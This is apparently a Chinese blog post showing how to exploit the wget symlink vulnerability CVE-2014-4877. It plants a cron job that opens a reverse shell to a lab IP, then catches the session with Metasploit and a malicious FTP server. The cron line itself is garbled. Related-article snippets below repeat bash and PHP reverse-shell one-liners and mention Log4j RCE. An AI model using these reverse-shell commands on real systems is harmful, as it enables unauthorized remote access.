linux反弹shell 漏洞,利用wget漏洞(CVE-2014-4877)反弹shell

最新推荐文章于 2023-05-15 23:55:42 发布
最新推荐文章于 2023-05-15 23:55:42 发布
阅读量560 收藏
点赞数
文章标签: linux反弹shell 漏洞

28日,linux操作系统的wget被发现安全漏洞,当用户通过wget命令递归下载文件时,攻击者可通过构造恶意的符号链接文件触发该漏洞,从而在wget用户的系统中创建任意文件、目录或符号链接并设置访问权限。

攻防实验室的小伙伴们在当天就对漏洞进行了分析验证。不久后国外的安全研究者已经能通过此漏洞反弹交互式的shell,利用的是linux的计划任务。Metasploit也更新了相应的模块,下面我们一起来看看怎么利用wget漏洞获得交互式的shell吧。

首先我们先建立一个计划任务文件,文件内容是反弹一个交互式的shell到本机。

cat>cronshell <

PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

* * * * * root bash -c '/dev/tcp/ 192.168.220.128/4444;sh &112 2>&112'

EOD

然后,我们利用msf监听本地端口。

78ce4928e66c4d16ee9a2e85be2bb2ea.png

搭建一个攻击ftp

61fcc4ec9be6f2ce0420154954b9f754.png

下面我用一台centos递归下载ftp上的内容。

012ed4c15d0e52ce32c28c08d7168b2f.png

可以看到,我们已经获得了session。

ab8108053ea4b4ec75e0a25ee128cfb8.png

小编感觉通过添加计划任务获得shell的方法真的很强(wei)大(suo),你有没有更好的利用方法呢?欢迎发邮件给我们。

容謹
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
短信验证码注册登录Shell - Httpie.sh、Shell - wget.sh文件.zip
11-27
短信验证码注册登录Shell 的两种方法- Httpie.sh、Shell - wget.sh文件.zip
CVE-2019-5782_CVE-2019-13768:全链Chrome 71.0.3578.98漏洞利用
07-24
利用和 目标 需要更新才能在 Windows 10 1909+ 上运行。 还需要提高特定目标机器的可靠性,其中原始 PoC 的可靠性约为 0%(但在另一个目标上的可靠性约为 100%) 安装依赖 wget https://bootstrap.pypa.io/pip/2.7/get-pip.py -o get-pip.py python2 get-pip.py pip2 install cherrypy 跑步 python2 server.py PoC变化: 释放对象的替换没有发生,因此将分配的 0x140 大小的块的数量从 0x88 增加到 0x8000。 未在 0x40404040000 分配页面,因此将分配的页面数量从 0xc88 增加到 2*0xc88 ROP 小工具mov rcx, rax ; mov rax, rcx ; add rsp, 28h ; ret mo
应用Wget自动下载Sentinel-2影像说明.docx
01-20
用于自动下载哨兵数据,解放自己
shell-script-to-install-multiple-packages:易于使用的Bash脚本在Ubuntu上安装组件堆栈
03-05
用于安装多个软件包的Shell脚本 易于使用的Bash脚本在Debian发行版/ Ubuntu / Mint上安装组件堆栈。 如何安装 拥有root权限,但没有必要,并在终端上安装wget $ su root # debian $ sudo su # ubuntu $ sudo apt-get install wget 灯 Apache,MySQL,PHP(LAMP)。 在终端中运行以下命令: 安装 $ sudo wget --no-cache -O - https://raw.githubusercontent.com/natancabral/shell-script-to-install-multiple-packages/main/run/lamp.sh | bash 移除所有 $ sudo wget --no-cache -O - https://raw.githubuse
一起弄清Linux中yum、wget、apt-get的用法
01-09
目录 前言: 一、常见Linux发行版本 二、 CentOS中yum的使用   1、安装     2、使用 三、Ubuntu中apt-get 1、安装 2、使用 四、CentOS和Ubuntu都可以的wget 1、CentOS中wget安装: 2、Ubuntu中wget安装 3、wget使用 总结: 前言:      对于初学Linux的人来说,太多的Linux内核版本会让人不知所措,并且刚开始需要我们下载各种编译器、软件包去调试我们的环境。这个时候肯定就需要我们使用到安装下载的工具。所以这里就来一起学习Linux中yum、wget、apt-get的用法和区别吧。 一、常见Linux发行版本
反弹shell学习(一):基础反弹姿势
E1even的博客
07-25 1853
文章目录bash反弹:nc反弹:-e被阉割的情况:nc -e:利用Telnet反弹shell方法1:方法2:python脚本反弹:PHP反弹shell总结: bash反弹: 这是最常见也是最简单的一种反弹shell的方式,直接看命令: 攻击机:nc -lvp 2333 受害机:bash -i >& /dev/tcp/192.168.28.133/2333 0>&1 攻击机: 受害机: 最后攻击机达成的效果: 可以命令执行,再实际中不可能获取的是root权限,所以成功反弹s
Wget CVE-2014-4877:FTP 符号链接任意文件系统访问
weixin_33730836的博客
06-02 240
Wget 爆出 CVE-2014-4877 漏洞:FTP 符号链接任意文件系统访问。 Package: wgetVersion: 1.15-1Severity: important Upstream fix: http://git.savannah.gnu.org/cgit/wget.git/commit/?id=18b0979357ed7dc4e11d...
CVE-2021-44228)Apache_Log4j2_RCE漏洞复现(反弹shell教学)
面向感觉挖洞,背向对象编程。欢迎关注VX公众号:EureKa安全团队
01-10 7046
Log4j2 组件在处理程序日志记录时存在JNDI 注入缺陷,未经授权的攻击者利用漏洞,可向目标服务器发送精心构造的恶意数据,触发Log4j2 组件解析缺陷,实现目标服务器的任意代码执行,获得目标服务器权限。本文是log4j2的漏洞复现以及利用漏洞进行命令执行RCE,反弹shell
Log4j漏洞反弹shell CVE-2021-44228 Apache Log4j 远程代码执行漏洞复现
monster663的博客
09-11 922
Log4j漏洞反弹shell CVE-2021-44228 Apache Log4j 远程代码执行漏洞复现
网络安全-木马入侵windows -msfvenom反弹shell(CMD)
weixin_48137911的博客
02-19 5497
需要做什么呢漏洞与木马的区别在于漏洞是某个系统某个框架,才能用特定的环境下才可以但是木马是全部机器都可以用因为木马相当于软件如果你电脑不能安装软件那你这个电脑也没啥用。
渗透与防御技术
YangYubo091699的博客
05-09 2万+
Kali操作系统的基本配置和使用 一、安装 下载KALI操作系统 https://www.kali.org/get-kali/ 二、修改root sudo passwd 三、基本工具介绍 信息搜集工具集: 主要面向网路、端口、服务识别、web指纹等一系列目标信息探测类的工具,常用工具有nmap masscan gobuster (zmap OneForAll) 漏洞分析工具集: 主要面向漏洞的发现、漏洞分析类的工具,漏洞主要面向系统、web、网络设备,常用的工具有 nikto web程序渗透
Wget漏洞CVE-2016-4971)利用方式解析
qq_40907977的博客
05-15 1375
漏洞描述 近日, CVE-2016-4971漏洞被正式披露,该漏洞影响全部旧版本wget, 黑客可以利用漏洞对程序员和运维工程师进行钓鱼,从而获得其主机权限或者植入rootkit。 漏洞详情 wget 作为*nix 系统常用下载工具,支持http、https、ftp 等多种协议,当使用wget 下载文件时,若初始下载http服务提供的下载资源, 如果服务器将下载资源重定向到ftp服务时,wget 会默认信赖http服务器重定向的ftp 链接地址和文件名,而不做二次验证。从而可能下载到恶意钓鱼者的恶意文件,
反弹SHELL&不回显带外&正反向连接&防火墙出入站&文件下载
zrx9988的博客
05-15 387
所谓的正向连接以及反向连接都是需要根据参照物来进行确认的,所举的例子均是以Linux外网服务器为参照;当存在命令注入漏洞时,就需要使用连接符,将上述命令进行拼接执行。反向连接就是我把我的IP与端口号交出去,等待别人来控制我;正向连接就是主动出击,去控制别的服务器;示例:(Windows控制Linux)Linux控制Windows。Windows控制Linux。外网去控制内网的主机。
Linux下几种常见的反弹shell的方式
BerL1n
01-27 1690
time:2019-04-11 21:07 最近在做ctf题时碰到一些命令执行题借用命令执行来反弹shell,这里记录一下。 1.bash反弹shell 个人感觉bash反弹是最简单、也是最常见的一种。 bash -i >& /dev/tcp/192.168.20.151/8080 0>&1 bash一句话命令详解 以下针对常用的bash反弹一句话进行了拆分说明,具体内容如下。 其实以上bash反弹一句完整的解读过程就是: bash产生了一个交互环境与本地主机主动发起与目标
【转】反弹Shell,看这一篇就够了
热门推荐
mastergu2的博客
10-26 2万+
前言 在渗透测试实战中,我们经常会遇到Linux系统环境,而让Linux主机反弹shell是再常见不过的事情了。 反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。 正向连接 假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、web服务、ssh、telnet等等都是正向连接。 反向连接 那么为什么要用反弹shell
Linux环境下的shell反弹
qq_55213436的博客
07-05 2005
在日常的渗透测试中,当我们拿到一个目标网站的漏洞的时候,往往可以采用shell反弹的方式来进行下一步的操作。反弹shell,就是攻击机监听在某个TCP/UDP端口为服务端,目标机主动发起请求到攻击机监听的端口,并将其命令行的输入输出转到攻击机。一般的shell反弹可以结合命令执行漏洞来实现。......
渗透测试-window反弹shell
lza20001103的博客
05-11 3880
window反弹shell
shell反弹的几种方式
nextdoor6的博客
05-16 5842
直接利用linux上的bash进行反弹 nc本地监听 nc -l -p port -vv base反弹 bash -i >& /dev/tcp/ownip/port 0>&1 利用其他服务器运行环境反弹,比如php,python等。 nc本地监听nc -l -p port -vvv php -r '$sock=fsockopen("10.0.0.1",1234);exec
安全技术系列之反弹Shell
好记性不如烂笔头
03-13 2263
常用反弹shell技术汇总
OpenSSL命令注入漏洞CVE-2022-1292)
最新发布
07-28
回答: OpenSSL命令注入漏洞CVE-2022-1292)是指在OpenSSL 1.0.2版本中存在的漏洞。为了修复这个漏洞,你需要将OpenSSL 1.0.2升级到SSL 3版本。首先,你可以使用以下命令查看OpenSSL的版本信息:\[1\] ``` openssl version ``` 然后,你可以从OpenSSL官方网站下载SSL 3的升级包。下载地址可以在官方网站上找到。\[2\]你可以使用以下命令下载升级包: ``` wget https://www.openssl.org/source/openssl-3.0.5.tar.gz ``` 下载完成后,解压升级包并进入解压后的目录: ``` tar -zxvf openssl-3.0.5.tar.gz cd openssl-3.0.5/ ``` 接下来,你可以使用以下命令进行编译和安装: ``` ./config shared zlib make make install ``` 在安装之前,建议备份原始文件。安装完成后,你可以添加新的OpenSSL软连接,并将编译后的库文件写入so库配置文件。具体操作可以参考相关文档或官方指南。\[2\] 请注意,升级OpenSSL可能会对系统产生影响,请确保在操作之前备份重要数据,并在升级过程中谨慎操作。 #### 引用[.reference_title] - *1* *2* *3* [openssl 漏洞升级 (CVE-2015-4000/CVE-2022-1292)](https://blog.csdn.net/qq_44637753/article/details/126829820)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值